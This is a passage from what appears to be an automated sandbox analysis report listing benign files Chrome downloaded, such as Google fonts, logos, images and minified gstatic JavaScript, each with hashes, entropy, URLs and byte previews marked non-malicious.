                                                                                                                                                                                                                                                            Preview:wOF2......{P......H...z...........................X..j.`....l..a.....P.._..8....h.6.$..l. ..8..{...[.3.@..o1.........(..vD.D^r.;..(..7%....?/i.a.t.kKa...fi(T.DE.....P.b..-n.i..=.q-1QR.$...1..3C.....A..v...y:.n....&M.}.p)...r...p.l...5t...I..N.....>G..Of.f...N.H"y.{9....d......u/..f.&=...:..@...A.e3.a2.e.R f.L..E..nN...mO...+.....f..`._..G....O...s].q..).m"k..a...U..........SDRR........^J..g.J......Mcic......u.f".|.:...J8./...zv.....?1.........<...[.-<.I........k<.M.kp]j.?...l.....d..Y ........k.(..M.S....E.(...~..#.........}..91 ...d...k...6....m.XA........p*.X.`.6...u.l...o..._....S._.G.....%SZ...K.~..1.Z.....vu..2...T.+E...Ob...\..D&...KdrR9..T"......Hr.T".. ..e........B0...._.O.\.33w.........-...2....u..K.+.J....R....G.TX....nI....@.."*l.%t..-$z<....1:.F.9.......5...f.4..%Y2.P.@.t.....S..e.1..z...o<....O.*ECp....z.....g. (...*....];...7...r..w....Z8W.$.z$.z.y{...6.........F.....'..y|...R.ss...[.UM.".}.d....d..f.%.l.A..N+\....H..Y..*t
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15208, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15208
                                                                                                                                                                                                                                                            Entropy (8bit):7.982663162282351
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:W83RLtRZmZ5GJ5Ugs0fRdyXIgRTXy/W8sJn1vS+umw/C5s9PZ9/:W83RLtRcGMgfCXhzWWFJnd3xwZ9Pr
                                                                                                                                                                                                                                                            MD5:CD05F978145C3B6F58B800C1FB5EF436
                                                                                                                                                                                                                                                            SHA1:916E50A357512D525C2850C8429E1E091574C9C9
                                                                                                                                                                                                                                                            SHA-256:F36242B1AB1AC1316640455B84D157E26487BFBB2B847C6DD4107D6CA071617F
                                                                                                                                                                                                                                                            SHA-512:6B7A8ABDE8611B63B3C26312B9C8ED688E7BBD2A29131F5DC0FDAD53770DEA2ECADF9CD14D432AC56EDB340CC86BB075F6EB176E10285F29CE57A4C8F47F3A48
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmhjtg.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......;h.......L..;..........................."..`..(.`........\..w.....6.$.... ..x..%...........n..d......4.HM:V....:dX@S......V...n.h4.f...d.3ki.zpo..._|......_.6...!H!....Y.=T<....h.S}...Nk.F.%gN].N.WLz....IN.......%{..1.6.0j#....H........3.[.......L....~.o....".4..].I..wm..F.D%5:!.....-,...UP.z..`.A`...V..Q...b......y..u.Uo\$=..6.{.....Q.....p.)p......SO.=.y..V..%D....n24...<.G)-...r{.m.1E4..\P...%....tF.....A....&. HW..$Vw..Soeu...<..M.U.....7.}.kE.]}..F4...7.....6i..0."A....._..}.w...[ .....;..E.r|..].....P..OM.wB.f&...F.E..+..2j..N...9-.mJ).....1.....e}.....%......C.Z......4.}..Nd...T...*...Tw.....YqDv.9d..N...H.f...Y...T...!.I.\.w..t%R.v.|..4Nk....)..f.^.7.........3.V|.....,dK._..[.&....:{u/... "..."....c{...\....$.W1...i..:..5..v!T.ks>"......X.X.# ^._..I.`..F.Mm...].......S".6A.P. \...%...`....'.@.n..;.R.@..e....3.L..rt<{/...^.{.'..l....I0.}.d.=.Y.....^.z.-.......zg......<K.....m..9.;}..5.'...'...^pVAo..K....|.V^n.O..S.C5...n..x.|.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1554
                                                                                                                                                                                                                                                            Entropy (8bit):4.133417333200851
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:tV0U/S903tFQRhYj45kRHDu9+u1lUetmCmifvqbbLaHu9HGn1u1lIdUWA/jTq9Kr:Z/S90PU5I1YdtmMqPLmum1YUUZ/jTq98
                                                                                                                                                                                                                                                            MD5:C5B92D70540100ACBE7A089EDD4AD521
                                                                                                                                                                                                                                                            SHA1:289EDD48A26448C16B24D8CEE077891AC256B63C
                                                                                                                                                                                                                                                            SHA-256:C2193804A202EB72C93FC3B18733063DA2FC140C1991AD624980C836AFD61D27
                                                                                                                                                                                                                                                            SHA-512:84244179B2669C0113F00FAADF2C4539F68DADD880A2E36149A31849AB3C654FE98F3FF3FDB1483438CC970FD25E29B35A85E7BE0F1B5CC490C3DCD249FD35A7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg id="google-solid-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24zm15.76-2c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52zm28.58-8.03h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3.52 1.74 0 3.1 1.5 3.1 3.54.01
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 14796, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14796
                                                                                                                                                                                                                                                            Entropy (8bit):7.984459440886347
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:xTigBuOeGaqjToV9edkOIjd2y4oeYAac15+lBa21ob6bdP:xWgBdCVWXymYy+Rowp
                                                                                                                                                                                                                                                            MD5:BB9D1306FBA272771A89683EA3B0A4FC
                                                                                                                                                                                                                                                            SHA1:7CAD32EAF7748F5AC06CDA557739FC9D5AEC6D9C
                                                                                                                                                                                                                                                            SHA-256:483F202789ED694C70F16E9CA008533BE41FC8F9DDC44D832F5818CEF0AC85F2
                                                                                                                                                                                                                                                            SHA-512:258CF5310ECE555A8B49A19F4B0AAB2D2B35CA8569CCA715BD8538C49E584B3325ED1C9956A76C600DE2482D947138D74CB0F6C2E446BE70E362D050D245EB17
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmhjtg.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......9...........9n.........................."..`..(.`........... .....6.$.... .....%............|^m6.v; .T[9.a.....-....@....)0.}.,..%..%...*..X........zci...z".r...O....nmNdaX........0..d..".....&.guTY{...]....6.'IN.#...K..h......D.Ipm..@.uj..)53*bT...x..x.s.....WaG....J..#P<....N.Wwz...[._j#:1A"..U..D...:....v..]tz.vAO...ofs.['.<Na<.#..$..@....mF..{3.).. k.b.Au.V+.A...J...a.n/.Y..s...m5{..^pA...b..M.%......5....RqZ|!}(..<(....~*.A.f..X.L.5..bz.g...u.:.._#z..b.."...b.. ......g.....G...9...2.[..9........0....DYP..Z\B. ...I....I9%...D^.t..EVN9.)t)....e.b.l3...9.S(.B.pX.kv9...&.=.j..)d..p..T.......K.....dY.I..m.......l.DB...s..B...._;';Y.....i.G..X......k.....4..*u........>k..?...$..+{<...FDD.iB..I..9.W.-..5..>..s.....p..bW.>......0.F@.!..!...H.4..0..D.89......T.P.@H(a.>...%..ao ...}...s=./.......4.>..*....t. E.......V....EH<...<.@".......e..8........]..$....Vl.NP..9.>.....>.......v...g.iU....s.QM=..1.0....GC...,....,F=...-..@..o.8......cy..Z.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                                            Entropy (8bit):5.052245007941961
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:qTCJLxoRucN+OjTcvXjXRH0DDmJS4RKb5KVEriqGQcFFuIOUoLRFQcRUlypqURL2:qTCJFou1i3mc4slTHmcIgtbNRLprTY
                                                                                                                                                                                                                                                            MD5:10C8AED69BDAED5FA3120401608F0899
                                                                                                                                                                                                                                                            SHA1:6E5A7025855BFB087B556203D18D24843EBBF804
                                                                                                                                                                                                                                                            SHA-256:6F62D85EF6ED53BC368C77B6A47394A41F3B16D9E07D0B8761E726784EEBCEB4
                                                                                                                                                                                                                                                            SHA-512:E2BAD6E1B1AF68AB4511264A4A8506FFFC4B07936BA3D1C5E809926E7E1741AA0DC1E7991848BD21380F12C962E6C6A7BA74FE82FE24EE762AC736A1DE29B045
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview: <svg id="expand-more" width="18" height="18" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):206740
                                                                                                                                                                                                                                                            Entropy (8bit):7.707466248278458
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5vmXBGKA:aRNRNRyGFANIIBmRa
                                                                                                                                                                                                                                                            MD5:5E4DA896919076B9A22246C582BBAD90
                                                                                                                                                                                                                                                            SHA1:07FB1482BC6DFBF82A4670C5FE218993F9EF90B8
                                                                                                                                                                                                                                                            SHA-256:9DCECFE50629F6BCF3D29CE39BBE1959F15F2CB93FAC9CD50AF6B48AA87FB6F2
                                                                                                                                                                                                                                                            SHA-512:F88A84AF0A2BAB003DE4E26F54914E4D405954B8CA56D85901145AFBF2F096B6896A189CC8ABC288938245E1FFC5DD87753996C18A797D0266528B446767112C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/yUfZC3C2Zy7jpvG0VIa0JY6deVELiJXaXOPx18ZYtHvHJDBKOhGLc9S0e2bXc3t8OdDyMbr6at7dqFWUzUspazqgpKlmdO3_YQHGmqPT=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):2789
                                                                                                                                                                                                                                                            Entropy (8bit):7.876679673763755
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:bZvAZM8NJso+Pcrav20EyR1PrmWUu83ZTXl+12002Eu228SeSpdtHuCgFGACU+l4:uM8Np+PSazE+8Wa3ZTV+1200j2Be4cCw
                                                                                                                                                                                                                                                            MD5:3BE8EFD4E69D96C9D60FB1B85CFC8268
                                                                                                                                                                                                                                                            SHA1:0421D28D1C4A9E3393D6ABB41FE91D1B1C9D7D7C
                                                                                                                                                                                                                                                            SHA-256:69B9ED7346F9A8BA12DA5B61E29EF72CF3409CE7257F89C201E2671A54BB8036
                                                                                                                                                                                                                                                            SHA-512:0C43894792B7230A0563CA17ABE8CDAAD86ED34BA6B8AB7C69078665570B3484B7B92272421040F2D7D6406E382A86C5280637CAECF07F2D536A3D9B70C90931
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/marketing-cms/03/71/f7f9f6d342ffa759ce67a688fa35/logo-translate-32x32.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...@...@......iq.....IDATx..Et.I.@k..o.{.....cff.33..-4........b&.hn..Q..&.jJr...z.Ki...PU.......>n...:.bJ.....w.....O.1..Ir.$.....wD..x@..u.&..?...O.1...Od...5..D.H.;.q.s.\>.....+.%...&&w.~......... J.........@......Q.w.W^......w5!J..............Q.w.e.>..e.~.....@.|..?3&......[D.....@...B&.j..(..;`1..~y.....z..(... ...W.. q...o.......@......n.glB c....r.-..RQYY/..ZDSs.hi.......7yill.......-UU5+SSS..(.w0NKZ......t....U.........v.9ZaJ).,.NX.....;..vp.|......k?...v......4.>1.....Ea.U..P@..}....v...(<.+...)\(..&.c...>....r.T........$;H.p94..EE..i.jF...&.a..K..9...9FQTl...S...0.4...........L.|I.'xX.N.8..l.0).K*..2H.ePh.Y`..W)E.....v.`..v..L.q....NuA...~.....O...w{...h.N.K...D]]]..$2.......,...2..u....6Bn.Y.......R.(+..,?H.HT.....~...D...9...$..x.1.&QPH.......#h..~..E.,O...).g.+....8..4..p.xfAyy9E.G..sT.6..O.x..{}..`x.).....;..6'.....G./.7..h..J.D.....3z.D<Id.....H.e._`.f.z..y....S.8q..O_..O.....^.......p#.]*........A)....f...;c.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1554
                                                                                                                                                                                                                                                            Entropy (8bit):4.133417333200851
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:tV0U/S903tFQRhYj45kRHDu9+u1lUetmCmifvqbbLaHu9HGn1u1lIdUWA/jTq9Kr:Z/S90PU5I1YdtmMqPLmum1YUUZ/jTq98
                                                                                                                                                                                                                                                            MD5:C5B92D70540100ACBE7A089EDD4AD521
                                                                                                                                                                                                                                                            SHA1:289EDD48A26448C16B24D8CEE077891AC256B63C
                                                                                                                                                                                                                                                            SHA-256:C2193804A202EB72C93FC3B18733063DA2FC140C1991AD624980C836AFD61D27
                                                                                                                                                                                                                                                            SHA-512:84244179B2669C0113F00FAADF2C4539F68DADD880A2E36149A31849AB3C654FE98F3FF3FDB1483438CC970FD25E29B35A85E7BE0F1B5CC490C3DCD249FD35A7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/img/glue-google-solid-logo.svg
                                                                                                                                                                                                                                                            Preview:<svg id="google-solid-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24zm15.76-2c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52zm28.58-8.03h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3.52 1.74 0 3.1 1.5 3.1 3.54.01
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2299)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):13296
                                                                                                                                                                                                                                                            Entropy (8bit):5.411639719190308
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:9mCWVoCfcjxXfYXWbihdSFBKA9bONQ3FoH9cTJaBBBWcQp0oSp/pZzbm1hiW2+c:9m5VNwxXfYmWhdS3K7V1QAp/pQ1pc
                                                                                                                                                                                                                                                            MD5:8DD7967D1E313A398D6DC6661AE5EA70
                                                                                                                                                                                                                                                            SHA1:EE8845574395706381EB2EDE9B543D05551063A3
                                                                                                                                                                                                                                                            SHA-256:BA3FC776CD07E23390DF02B6A3CE156CA59CE4BB178625566680F62E8B8D20CE
                                                                                                                                                                                                                                                            SHA-512:4913D1C070FE9F8E1E583E2CE69F737DA17C6F2BBE97D9687B34378E148A48D1BD8C4B3CB8D4B89FA7BEC4785E69EEC45CC95D77798D6EDB727EB12D6AED7369
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=RqjULd"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("RqjULd");.var Xta=function(a){if(_.ea&&_.ea.performance&&_.ea.performance.memory){var b=_.ea.performance.memory;if(b){var c=new GB;isNaN(b.jsHeapSizeLimit)||_.x(c,1,Math.round(b.jsHeapSizeLimit).toString());isNaN(b.totalJSHeapSize)||_.x(c,2,Math.round(b.totalJSHeapSize).toString());isNaN(b.usedJSHeapSize)||_.x(c,3,Math.round(b.usedJSHeapSize).toString());_.kj(a,GB,1,c)}}},Yta=function(a){if(HB()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new IB;if(b=b[0]){switch(b.type){case "navigate":c.qe(1);.break;case "reload":c.qe(2);break;case "back_forward":c.qe(3);break;case "prerender":c.qe(4);break;default:c.qe(0)}var d=_.x(c,2,Math.round(b.startTime));d=_.x(d,3,Math.round(b.fetchStart));d=_.x(d,4,Math.round(b.domainLookupStart));d=_.x(d,5,Math.round(b.domainLookupEnd));d=_.x(d,6,Math.round(b.connectStart));d=_.x(d,7,Math.round(b.connectEnd)
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1000x400, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):115581
                                                                                                                                                                                                                                                            Entropy (8bit):7.96539376502019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:7HxpzjMHQ4MeFt5vCCyLubTIAVSTWHA9Uej5oYig5:7HDMHJFtcXLg1hH4UeXi2
                                                                                                                                                                                                                                                            MD5:A5DAAEDB989BDD603227C9DC95924672
                                                                                                                                                                                                                                                            SHA1:0A689FD2DFBCD14E2ED7C8D6D3A9E374B0EAA241
                                                                                                                                                                                                                                                            SHA-256:37A2F54E5B770C0F3EBF17C789959D4E17A4978472BE3E9068764C82167A273D
                                                                                                                                                                                                                                                            SHA-512:1DCA2045A8FB999F889FC07CAA6105FE31C3DBF252816EF7076BBC54B9864DCD2191A23FF7738ACB25EE2C973CEF5581376891992B63CD40B2EB5074C8E2193A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2016/tunisia-national-day-2016-5102192186884096-hp2x.jpg
                                                                                                                                                                                                                                                            Preview:............................................................................................................................................................................................................................................!..1.AQ..a".q.2...B#....R$..b3.rC%.....Scs.DTt...v7.....5&.4UV'..d.F......................!..1A.Qaq.."....2R.....Br.#.b..3S$....C4.sc.5.DT%...............?...@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2324)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):97027
                                                                                                                                                                                                                                                            Entropy (8bit):5.465699824958578
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:la3ky4g6ma6PRYy9VKDMus+FwIHzaZDbcyqmf2XSu1DpJdFhmT10KSBEkLH:t3z2ODPytZnhlAHDpJdXKS3
                                                                                                                                                                                                                                                            MD5:8DCED92EB242738DE245EBB35F6AC703
                                                                                                                                                                                                                                                            SHA1:6D8B49B161817917A1BEEE36904A2A3A1DEC2BC6
                                                                                                                                                                                                                                                            SHA-256:91428F2380D927550322021A99670A8B385D0A493B16A71BCE137CB420D6DAB9
                                                                                                                                                                                                                                                            SHA-512:93D4E8DBCC4C95D3B92E65F434DEEC712C7536644C697C450E3B7A044FB61236C9CE449F3898D8B7B49E11E741A2740CFAA37986CA78BD96B0D74F407F4F52BD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),r=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.r("Symbol",function(a){if(a)return a;var b=function(f,g){this.nc=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1300x400, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):175505
